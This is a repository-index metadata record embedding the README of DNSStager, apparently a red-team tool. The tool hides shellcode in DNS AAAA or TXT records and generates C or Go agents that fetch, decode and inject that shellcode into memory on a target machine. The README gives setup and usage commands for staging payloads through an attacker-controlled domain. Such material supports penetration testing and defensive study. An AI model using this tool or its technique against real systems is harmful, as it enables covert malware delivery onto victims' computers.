{"id":37149270,"url":"https://github.com/mhaskar/dnsstager","last_synced_at":"2026-01-14T17:37:54.742Z","repository":{"id":54774037,"uuid":"359261102","full_name":"mhaskar/DNSStager","owner":"mhaskar","description":"Hide your payload in DNS","archived":false,"fork":false,"pushed_at":"2023-05-03T12:25:07.000Z","size":218,"stargazers_count":613,"open_issues_count":6,"forks_count":132,"subscribers_count":12,"default_branch":"main","last_synced_at":"2025-07-12T03:48:43.191Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mhaskar.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-04-18T21:58:21.000Z","updated_at":"2025-07-08T21:51:55.000Z","dependencies_parsed_at":"2024-06-18T19:58:59.653Z","dependency_job_id":"2c395840-2e8e-491f-b586-3cf75901c084","html_url":"https://github.com/mhaskar/DNSStager","commit_stats":{"total_commits":54,"total_committers":4,"mean_commits":13.5,"dds":"0.12962962962962965","last_synced_commit":"fd14a253087d3415838c00489e2faf5a0b1c6348"},"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/mhaskar/DNSStager","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mhaskar%2FDNSStager","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mhaskar%2FDNSStager/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mhaskar%2FDNSStager/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mhaskar%2FDNSStager/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mhaskar","download_url":"https://codeload.github.com/mhaskar/DNSStager/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mhaskar%2FDNSStager/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28428888,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-14T16:38:47.836Z","status":"ssl_error","status_checked_at":"2026-01-14T16:34:59.695Z","response_time":107,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2026-01-14T17:37:54.144Z","updated_at":"2026-01-14T17:37:54.735Z","avatar_url":"https://github.com/mhaskar.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# What is DNSStager? ![](https://img.shields.io/badge/python-3-blue)\n\nDNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.\n\nDNSStager will create a malicious DNS server that handles DNS requests to your domain and return your payload as a response to specific record requests such as `AAAA` or `TXT` records after splitting it into chunks and encoding the payload using different algorithms.\n\nDNSStager can generate a custom agent written in `C` or `GoLang` that will resolve a sequence of domains, retrieve the payload, decode it and finally inject it into the memory based on any technique you want.\n\nYou can edit the code of DNSStager agent as you wish, and build it using your own custom execution techniques.\n\nThe main goal of using DNSStager is to help red teamers/pentesters to deliver their payloads in stealthy channel using DNS.\n\n\n# How does it work?\n\nBased on your DNS resolution option, DNSStager will split your payload into chunks and save each chunk of the payload as a response for a subdomain.\n\nFor example, if you choose `IPV6` as your option to retrieve the payload, the DNS response will be something like:\n\n`cloud-srv-1.test.mydnsserver.live. 300 IN AAAA\t5648:31d2:6548:8b52:6048:8b52:1848:8b52`\n\nWhere `5648:31d2:6548:8b52:6048:8b52:1848:8b52` is a part of your payload.\n\nSo, the agent will resolve some domains to retrieve the payload and then decode it and finally inject it into memory.\n\nCurrently, DNSStager only supports two records, `AAAA` and `TXT`. You can encode your payload using XOR for the `AAAA` record and by default it will be encoded as base64 if you choose `TXT` record.\n\n# DNSStager key features:\n\nDNSStager has some key features such as:\n\n* Hide and Resolve your payload in `IPV6` records.\n* Hide and Resolve your payload in `TXT` records.\n* XOR encoder to encode your payload.\n* Base64 encoder to encode your payload (only for TXT records).\n* Pure agent written in `C` with the ability to customise it.\n* Pure agent written in `GoLang` with the ability to customise it.\n* The ability to use sleep between each DNS request.\n* AND MUCH MORE TO COME!\n\n# Requirements\n\nYou can install DNSStager python requirements via:\n\n`pip3 install -r requirements.txt`\n\nYou need to install `GoLang` version `1.16.3` and to make sure to install the following `GoLang` packages:\n\n* golang.org/x/sys\n* github.com/miekg/dns\n\nAlso, make sure to install `ming-w64` via:\n\n`apt install mingw-w64`\n\nThe script `setup.sh` should do that for you, but double check the requirements before you use it!\n\n# Installation\n\nTo get the latest version of DNSStager, make sure to clone it from this repo using the following command:\n\n`git clone https://github.com/mhaskar/DNSStager`\n\nThen you need to install the requirements using the following command:\n\n`pip3 install -r requirements.txt`\n\nAnd make sure to install all the previously mentioned requirements too.\n\nAfter doing all that, you are ready to execute DNSStager **as root** to get the following:\n\n```\naskar•/opt/redteaming/DNSStager(main⚡)» sudo ./dnsstager.py \n\n \n \n \n██████ ███ ██ ███████ ███████ ████████ █████ ██████ ███████ ██████ \n██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ \n██ ██ ██ ██ ██ ███████ ███████ ██ ███████ ██ ███ █████ ██████ \n██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ \n██████ ██ ████ ███████ ███████ ██ ██ ██ ██████ ███████ ██ ██ \n \n \n \n\n Stable v1.0 Hide your payload in DNS\n \n[-] Please specify a domain name using --domain\n```\n# Usage\n\nTo start using DNSStager, make sure to setup your DNS settings first, you need to make your domain points to the DNSStager instance as `NS record` in order to handle all the DNS requests to your domain.\n\nYou can read [this full article](https://shells.systems/unveiling-dnsstager-a-tool-to-hide-your-payload-in-dns) about how to setup and use DNSStager.\n\nAnd you can check the options using `-h` switch like the following:\n\n```\naskar•/opt/redteaming/DNSStager(main⚡)» sudo ./dnsstager.py -h \nusage: dnsstager.py [-h] [--domain DOMAIN] [--payloads] [--prefix PREFIX] [--payload PAYLOAD] [--output OUTPUT] [--shellcode_path SHELLCODE_PATH] [--xorkey XORKEY] [--sleep SLEEP]\n [--format FORMAT]\n\nDNSStager main parser\n\noptional arguments:\n -h, --help show this help message and exit\n --domain DOMAIN The domain you want to use as staging host\n --payloads show all payloads\n --prefix PREFIX Prefix to use as part of your subdomain schema\n --payload PAYLOAD Payload to use, see --payloads for more details\n --output OUTPUT Agent output path\n --shellcode_path SHELLCODE_PATH\n Shellcode file path\n --xorkey XORKEY XOR key to encode your payload with\n --sleep SLEEP sleep for N seconds between each DNS request\n --format FORMAT payload format (.dll or .exe)\n --tcp Start and use the DNS server via TCP protocol\n```\n\n* --domain: you can use this option to select the main domain you will use to handle the DNS requests for.\n\n* -- prefix: The prefix you want to use for the subdomain schema\nFor example, if your main domain is `fakedns.live` you can specify the prefix as \"cdn\" for example, So the generate domains will be a a pattern as the following:\n\n * `cdn0.fakedns.live`\n * `cdn1.fakedns.live`\n * `cdnN.fakedns.live`\n\nWhere `N` is auto generated number represent the number of chunks of your payload.\n\n* --payload: the DNSStager payload \"agent\" you want to generate based on the technique, programming language and architecture.\n\n* --output: Output path to save DNSStager executable payload \"agent\".\n\n* --shellcode_path: Your `raw`/`bin` shellcode path.\n\n* --xorkey: XOR key to encode the payload with.\n\n* --sleep: Used to sleep for N seconds between each DNS request.\n\n* --tcp: Start and use the DNS server via TCP protocol\n\n## DNSStager Payloads\n\nTo check the available DNSStager payloads, you can use `./dnsstager.py --payloads` to get the following results:\n\n```\naskar•/opt/redteaming/DNSStager(main⚡)» sudo ./dnsstager.py --payloads \n\n[+] 6 DNSStager payloads Available\n\nx64/c/ipv6\t\t\tResolve your payload as IPV6 addresses xored with custom key via compiled x64 C code\nx86/c/ipv6\t\t\tResolve your payload as IPV6 addresses xored with custom key via compiled x86 C code\nx64/golang/txt\t\t\tResolve your payload as TXT records encoded using base64 compiled x64 GoLang code\nx64/golang/ipv6\t\t\tResolve your payload as IPV6 addresses encoded with custom key using byte add encoding via compiled x64 GoLang code\nx86/golang/txt\t\t\tResolve your payload as TXT records encoded using base64 compiled x86 GoLang code\nx86/golang/ipv6\t\t\tResolve your payload as IPV6 addresses encoded with custom key using byte add encoding via compiled x86 GoLang code\n```\n## Example of using DNSStager with IPV6\n\nThis example will start DNSStager to resolve your payload as `IPV6` using the domain `test.mydnsserver.live` with prefix `cloud-srv-` to generate compiled `x64 C` agent encoded with 0x10 as key:\n\n`sudo ./dnsstager.py --domain test.mydnsserver.live --payload x64/c/ipv6 --output /tmp/a2.exe --prefix cloud-srv- --shellcode_path ~/payload.bin --sleep 1 --xorkey 0x10\n` \n\nAnd the output will be:\n\n![Alt text](screenshots/Starting-DNSStager-x64-ipv6.png)\n\nAnd to check if everything is working well, lets send DNS query to `cloud-srv-0.test.mydnsserver.live` to get the following:\n\n![Alt text](screenshots/DNSStager-dig-test.png)\n\nWe can see that we received `f642:89ee:fae2:c20a:a0a:4b5b:4b5a:585b` as response which is the first 16 bytes of our encoded payload.\n\nThen you can execute the agent `/tmp/a2.exe` (as set in using --output in the comand line) on the target machine and that will download all of the chunks required, decode them and inject them into memory for you.\n\n# Resources\n\n* [DNSStager v1.0 stable: stealthier code, DLL agent \u0026 much more](https://shells.systems/?p=2112).\n* [Unveiling DNSStager: A tool to hide your payload in DNS](https://shells.systems/unveiling-dnsstager-a-tool-to-hide-your-payload-in-dns/).\n\n# License\n\nThis project is licensed under the GPL-3.0 License - see the LICENSE file for details\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmhaskar%2Fdnsstager","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmhaskar%2Fdnsstager","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmhaskar%2Fdnsstager/lists"}